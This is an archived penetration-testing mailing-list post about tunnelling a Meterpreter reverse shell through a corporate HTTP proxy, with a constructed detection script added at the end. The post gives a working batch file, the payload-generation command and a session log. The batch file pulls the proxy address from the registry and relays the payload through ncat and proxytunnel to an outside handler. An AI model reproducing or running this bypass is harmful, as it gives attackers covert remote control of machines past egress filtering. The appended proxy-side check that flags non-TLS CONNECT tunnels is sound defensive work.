Penetration Testing mailing list archives
Tunnelling Meterpreter connections through HTTP/S Proxy servers
From: "Sherif Eldeeb" <archeldeeb () gmail com>
Date: Sat, 3 Jul 2010 08:54:57 +0300
I hit a dead end and help is appreciated. "Already asked the metasploit list but still stuck."

I've been trying the past few days to get a meterpreter reverse_tcp exe to connect back through an HTTP proxy, and I had no idea that it was going to be that difficult "for me". My approach was including another tunneling program that will listen at a local port for meterpreter's connection and handle the proxy bypassing, a batch file that will automate the process, then packing the whole thing with IExpress.

Meterpreter connects locally ==> proxy bypassing program ==> PROXY SERVER ====|Internet|===> exploit/multi/handler

And I've been "partially" successful so far and feel like I'm almost there. Here's the scenario:

- MS ISA 2006 firewall & web proxy.
- Outbound ports allowed: only 80 & 443 through the web proxy; 110, 25 and 21 with some kind of protocol filtering.
- Inbound open ports: none. Externally exposed services & servers: none.
- Solution must be valid if a restricted user executes the program.

Long story short, here's what I found so far:

- For those who didn't try before: just using LPORT as 80 or 443 doesn't work because of the web proxy; it even made the meterpreter.exe grow in memory usage to more than 1.5 GB, with HDD swapping like crazy and CPU at 100%.
- Using port 110 or 25 initially connects, but gets dropped immediately by the firewall's protocol filter when it detects that the data being sent is not actually what it should be.
- reverse_https & reverse_http payloads are not working, as discussed earlier.

TUNNELING EXPERIMENTS:

I will not list what didn't work for me; only "proxytunnel" looked like the one with promising results, but it had two serious drawbacks:

1. You have to define the company's proxy server IP address and port number, which I do not know, so I used the "REG" command to extract the data from the registry.
2. It works with STDIN & STDOUT, "not listening on ports AFAIK": I used "ncat -c" to listen on the local port and redirect the connection to proxytunnel.exe.

Here's the bat file that did both:

==========CODE==========
@echo off
REM Read the "host:port" of the proxy from the current user's Internet Settings (HKCU, so no admin rights needed)
for /f "tokens=3 delims=^ " %%a IN ('reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer ^| find "Proxy"') DO set PRXY=%%a
REM Listen on the local port the payload connects to and hand each connection to proxytunnel (-k keeps listening)
ncat -k -l 127.0.0.1 4455 -e "proxytunnel.exe -q -N -p %PRXY% -d MyMultiHandlerServer:443"
==========CODE==========

Proxytunnel options:
- "-q" quiet
- "-N" use NTLM auth.
- "-p" proxy server
- "-d" multi/handler_server:port

And then make msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4455, put the programs together in one folder, then execute the payload.exe. Guess what? It works! Sort of :(

=========
msf exploit(handler) >
[*] Sending stage (748032 bytes) to 66.55.229.36
[*] Meterpreter session 1 opened (MyMultiHandlerServer:443 -> 66.55.229.36:64206) at 2010-06-20 07:40:47 +0000
sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > sysinfo
Computer: VICTIM-PC
OS      : Windows Vista (Build 6002, Service Pack 2).
Arch    : x86
Language: en_US
meterpreter > ls
[-] Error running command ls: Rex::TimeoutError Operation timed out.
meterpreter > sysinfo
[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.
=========

As you can see, it connects and interacts, then the connection dies after a short while for some reason; the payload.exe, ncat.exe and proxyserver.exe are all still running, and the ISA monitor still indicates that the connection is established. The same happens when executing any command like "run winenum": it starts the commands and records the results, but after 15 to 20 commands it just dies and times out.

Away from meterpreter, if I run "ncat -l 443" at the attacking box and "C:\proxytunnel.exe -q -N -p proxyserver:8080 -d attacking:443" at the victim's machine, *the connection gets past the proxy*, is bidirectional and NEVER gets dropped, though it's a useless chat program.

Any help is appreciated, really.

Thanks in advance,
Sherif.

WHAT DIDN'T WORK:
- GNU-HTTPtunnel: HTS didn't port-forward nicely to multi/handler.
- Stunnel: has a nice looking icon in the notification area :) didn't try connectivity.
- Ncat --ssl: for some reason it doesn't accept -e & --ssl together, which might help.
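An added example from the proxy owner's side (my own code, not from Sherif's post, Metasploit or proxytunnel): the tunnel in the post gets through because the web proxy passes a CONNECT to port 443 without looking at the bytes that follow, so a proxy that keeps the first client bytes of each CONNECT tunnel can flag ones that do not open with a TLS ClientHello. The ConnectTunnel record is a hypothetical shape (not an ISA log format) and the sample tunnels are constructed.

```python
"""Constructed example: flag CONNECT tunnels to :443 whose first client bytes are not TLS."""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ConnectTunnel:
    """Hypothetical record a proxy could keep per CONNECT tunnel (not an ISA log format)."""
    client: str         # internal client address
    dest: str           # "host:port" from the CONNECT request line
    first_bytes: bytes  # first bytes the client sent after "200 Connection established"


def looks_like_tls_client_hello(data: bytes) -> bool:
    """True if data starts with a TLS record carrying a ClientHello.

    Record header: type 0x16 (handshake), version 0x03 0x00..0x04, 2-byte length,
    then handshake type 0x01 (ClientHello). Too-short data is treated as "not TLS".
    Caveat: an SSLv2-compatible ClientHello starts with 0x80 and would be flagged too.
    """
    if len(data) < 6:
        return False
    return (data[0] == 0x16 and data[1] == 0x03
            and data[2] in range(0x00, 0x05) and data[5] == 0x01)


def suspicious_tunnels(tunnels: List[ConnectTunnel]) -> List[Tuple[str, str, str]]:
    """Return (client, dest, first-bytes-hex) for :443 tunnels that do not open with TLS."""
    findings = []
    for t in tunnels:
        _, _, port = t.dest.rpartition(":")
        if port == "443" and not looks_like_tls_client_hello(t.first_bytes):
            findings.append((t.client, t.dest, t.first_bytes[:8].hex()))
    return findings


# Constructed sample tunnels (not real captures).
SAMPLE_TUNNELS = [
    # Browser to a web site: TLS 1.0 record header, ClientHello of length 0xa1.
    ConnectTunnel("10.0.0.5", "www.example.com:443", bytes.fromhex("16030100a5010000a10303")),
    # Something that is not TLS at all inside a :443 tunnel (constructed bytes).
    ConnectTunnel("10.0.0.7", "203.0.113.10:443", b"\x00\x00\x00\x14\x01\x02\x03\x04"),
    # Tunnel to a non-443 port: outside this check's scope.
    ConnectTunnel("10.0.0.9", "203.0.113.11:8443", b"GET / HTTP/1.1\r\n"),
]

if __name__ == "__main__":
    for client, dest, head in suspicious_tunnels(SAMPLE_TUNNELS):
        print(f"review: {client} -> {dest} opened a CONNECT tunnel with non-TLS bytes {head}")
```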